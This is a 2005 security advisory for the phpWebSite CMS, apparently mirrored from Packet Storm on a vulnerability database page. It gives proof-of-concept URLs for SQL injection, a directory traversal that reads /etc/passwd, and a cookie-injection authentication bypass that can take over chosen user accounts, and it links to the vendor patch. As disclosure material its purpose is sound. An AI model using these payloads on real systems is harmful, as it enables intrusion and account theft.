Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpwebsiteSQL.txt

🗓️ 07 Jul 2005 00:00:00Reported by Diabolic CrabType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

PHPwebsite multiple critical vulnerabilities patch release

Code
`This is a multi-part message in MIME format.  
  
------=_NextPart_000_00D1_01C58264.72EAAD10  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
Dcrab 's Security Advisory  
http://www.dbtech.org  
Deadbolt Computer Technologies  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc =  
or even code them. Learn more at http://www.dbtech.org  
  
Severity: High  
Title: Phpwebsite has multiple serious vulnerabilities  
Date: 7/07/2005  
  
Vendor: Phpwebsite  
Vendor Website: http://phpwebsite.appstate.edu  
Vendor Status: Contacted and patch has been released  
Summary: There are, multiple sql injection, authentication bypass and =  
directory transversal vulnerabilities in Phpwebsite.  
  
  
Proof of Concept Exploits:=20  
  
www.example.com/phpwebsite/index.php?module=3D'&search_op=3Dsearch&mod=3D=  
all&query=3D1&search=3DSearch=20  
SQL injection  
  
DB Error: syntax error  
SELECT show_block, block_title FROM mod_search WHERE module=3D''' =  
[nativecode=3D1064 ** You have an error in your SQL syntax. Check the =  
manual that corresponds to your MySQL server version for the right =  
syntax to use near ''''' at line 1]=20  
  
www.example.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=  
od=3D'&query=3D1&search=3DSearch  
SQL injection  
  
DB Error: syntax error  
SELECT block_title FROM mod_search WHERE module=3D''' [nativecode=3D1064 =  
** You have an error in your SQL syntax. Check the manual that =  
corresponds to your MySQL server version for the right syntax to use =  
near ''''' at line 1]=20  
  
www.example.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=  
od=3D../../../../../../../../etc/passwd%00&query=3D1&search=3DSearch  
Directory traversal  
  
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash =  
daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing =  
daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer =  
daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News=20  
  
Log into a user account with remember me checked, then delete all the =  
cookies beside the one with [mod_users][rememberme]  
Cookie name: *an md5 hash set by the website* [mod_users][rememberme]  
Value: a' or 'a' =3D 'a  
You can also steal specific user accounts by setting the cookie value as =  
a' or user_id =3D '5'  
  
Solution:  
The vendor's were contacted via email and responded quickly. The issue =  
was corresponded to them after which a patch was released on their =  
official website.=20  
  
You can get the security patch at, =  
http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_pat=  
ch_20050705.2.tgz  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah =  
and at http://www.hackerscenter.com  
  
Author:=20  
These vulnerabilities have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my =  
soon to come out book on Secure coding with php.  
  
  
-------------------------------------------------------------------------=  
-------  
  
Sincerely,=20  
Diabolic Crab=20  
  
  
  
  
  
------=_NextPart_000_00D1_01C58264.72EAAD10  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV>  
<DIV>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20  
href=3D"http://www.dbtech.org">http://www.dbtech.org</A><BR>Deadbolt =  
Computer=20  
Technologies</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =  
servers,=20  
scripts, networks, etc or even code them. Learn more at <A=20  
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Phpwebsite has =  
multiple=20  
serious vulnerabilities<BR>Date: 7/07/2005</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Vendor: Phpwebsite<BR>Vendor Website: =  
<A=20  
href=3D"http://phpwebsite.appstate.edu">http://phpwebsite.appstate.edu</A=  
><BR>Vendor=20  
Status: Contacted and patch has been released</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2>Summary: There are, multiple sql =  
injection,=20  
authentication bypass and directory transversal vulnerabilities in=20  
Phpwebsite.</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV><FONT face=3DArial =  
size=3D2>  
<DIV><BR>Proof of Concept Exploits: </DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A=20  
href=3D"http://www.example.com/phpwebsite/index.php?module=3D'&search=  
_op=3Dsearch&mod=3Dall&query=3D1&search=3DSearch">www.example=  
.com/phpwebsite/index.php?module=3D'&search_op=3Dsearch&mod=3Dall=  
&query=3D1&search=3DSearch</A>=20  
<BR>SQL injection</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>DB Error: syntax error<BR>SELECT show_block, block_title FROM =  
mod_search=20  
WHERE module=3D''' [nativecode=3D1064 ** You have an error in your SQL =  
syntax. Check=20  
the manual that corresponds to your MySQL server version for the right =  
syntax to=20  
use near ''''' at line 1] </DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A=20  
href=3D"http://www.example.com/phpwebsite/index.php?module=3Dsearch&s=  
earch_op=3Dsearch&mod=3D'&query=3D1&search=3DSearch">www.exam=  
ple.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=  
od=3D'&query=3D1&search=3DSearch</A><BR>SQL=20  
injection</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>DB Error: syntax error<BR>SELECT block_title FROM mod_search WHERE=20  
module=3D''' [nativecode=3D1064 ** You have an error in your SQL syntax. =  
Check the=20  
manual that corresponds to your MySQL server version for the right =  
syntax to use=20  
near ''''' at line 1] </DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A=20  
href=3D"http://www.example.com/phpwebsite/index.php?module=3Dsearch&s=  
earch_op=3Dsearch&mod=3D../../../../../../../../etc/passwd%00&que=  
ry=3D1&search=3DSearch">www.example.com/phpwebsite/index.php?module=3D=  
search&search_op=3Dsearch&mod=3D../../../../../../../../etc/passw=  
d%00&query=3D1&search=3DSearch</A><BR>Directory=20  
traversal</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash=20  
daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing=20  
daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer=20  
daemon:/var/spool/clientmqueue:/bin/false <A=20  
href=3D"news:x:9:13:News">news:x:9:13:News</A> </DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Log into a user account with remember me checked, then delete all =  
the=20  
cookies beside the one with [mod_users][rememberme]<BR>Cookie name: *an =  
md5 hash=20  
set by the website* [mod_users][rememberme]<BR>Value: a' or 'a' =3D =  
'a<BR>You can=20  
also steal specific user accounts by setting the cookie value as a' or =  
user_id =3D=20  
'5'</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Solution:</DIV>  
<DIV>The vendor's were contacted via email and responded quickly. The =  
issue was=20  
corresponded to them after which a patch was released on their official =  
website.=20  
</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>You can get the security patch at, <A=20  
href=3D"http://phpwebsite.appstate.edu/downloads/security/phpwebsite_secu=  
rity_patch_20050705.2.tgz">http://phpwebsite.appstate.edu/downloads/secur=  
ity/phpwebsite_security_patch_20050705.2.tgz</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A> and=20  
at <A =  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A></D=  
IV>  
<DIV>&nbsp;</DIV>  
<DIV>Author: <BR>These vulnerabilities have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://www.dbtech.org/">http://www.dbtech.org/</A>. Lookout for =  
my soon to=20  
come out book on Secure coding with php.<BR></FONT></DIV>  
<DIV>  
<HR>  
<BR>Sincerely, <BR>Diabolic Crab=20  
<BR><BR><BR><BR><BR></DIV></DIV></DIV></BODY></HTML>  
  
------=_NextPart_000_00D1_01C58264.72EAAD10--  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jul 2005 00:00Current
7.4High risk
Vulners AI Score7.4
phpwebsitesql injectionauthentication bypassdirectory traversalsecurity patchdiabolic crab
26